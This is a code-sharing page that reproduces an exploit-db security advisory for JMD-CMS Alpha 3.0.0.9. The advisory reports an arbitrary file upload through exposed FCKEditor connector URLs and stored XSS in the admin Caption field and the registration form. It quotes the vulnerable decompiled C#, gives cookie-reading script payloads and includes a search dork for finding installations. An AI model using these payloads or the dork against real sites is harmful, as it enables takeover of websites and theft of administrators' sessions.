扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 |
''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moaub-19-jmd-cms-multiple-remote-vulnerabilities/ ''' Abysssec Inc Public Advisory Title:JMD-CMS MultipleRemote Vulnerabilities Affected Version :JMD-CMS Alpha 3.0.0.9 Discovery:www.abysssec.com Vendor :http://www.jmdcms.com/ Download Links :http://jmdcms.codeplex.com/releases/view/6674 Dork :"powered by jmdcms.com" Admin Page :http://localhost/jmdcms/Login.aspx Description : =========================================================================================== This version of JMD-CMS(JMD-CMS Alpha 3.0.0.9) have Multiple Valnerabilities : 1- Upload arbitrary file with FCKEditor 2- Persistent XSS 1) Upload arbitrary file with FCKEditor: =========================================================================================== With this vulnerability you can upload any file with this Link: http://localhost/jmdcms/FCKeditor/editor/fckeditor.html orhttp://localhost/jmdcms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.aspx your files will be in this path: http://localhost/UserFiles/Image/ 2) Persistent XSS Vulnerabilities: =========================================================================================== 1-In this path you can see a persistent XSS Valnerability in Caption field: (this page is accessible for Admin) http://localhost/jmdcms/addPage.aspx?Parent_Page=default Vulnerable Code: In App_Web_25otrp1v.dll--->Modules_Admin_AddPage Class //////////////////////////////////////////// public void SavePage(string URI) ... .. . this.Page_Name.Text = this.Page_Name.Text.Replace("~", "-"); try { server.JMD_PAGE_SAVE(this.Page_Id.Value, Util.SiteURL(URI), this.Page_Name.Text, this.Page_Caption.Text, this.Meta_Title.Text, this.Meta_Desc.Text, this.Meta_Keywords.Text, this.Parent_Page_Name.Text, str, str2, str3, this.CBLToString(this.View_Roles), this.CBLToString(this.Add_Roles), this.CBLToString(this.Edit_Roles), this.CBLToString(this.Delete_Roles), this.CBLToString(this.Move_Roles), this.CBLToString(this.Add_Module_Roles), "0", str4, this.Page_Sort.Text, str5); ... } //////////////////////////////////////////// As you can see No Sanitizasion for Value: this.Page_Caption.Text For example Caption can be: <script>alert(document.cookie)</script> 2- In Register Page : http://localhost/jmdcms/NewUser.aspx Code: In App_Web_25otrp1v.dll--->Modules_Core_NewUser class //////////////////////////////////////////// public bool SaveUser() ... .. . try { server.JMD_USER_INSERT(this.User_Id.Value, Util.SiteURL(base.Request.QueryString["Pg"].ToString()), this.User_Name.Text, this.User_Display_Name.Text, str, salt, this.Email.Text); ... } //////////////////////////////////////////// No Sanitization for Values. For Example you can enter this values in Register Page: (This fieldis limited to 50 Character) UserID= user<script>alert(document.cookie)</script> DisplayName = user<script>alert(document.cookie)</script> Password= user Email = ur@yah.com<script>alert(document.cookie)</script> and when Admin see this page, your script will be run. http://localhost/jmdcms/Users.aspx =========================================================================================== |
体验盒子
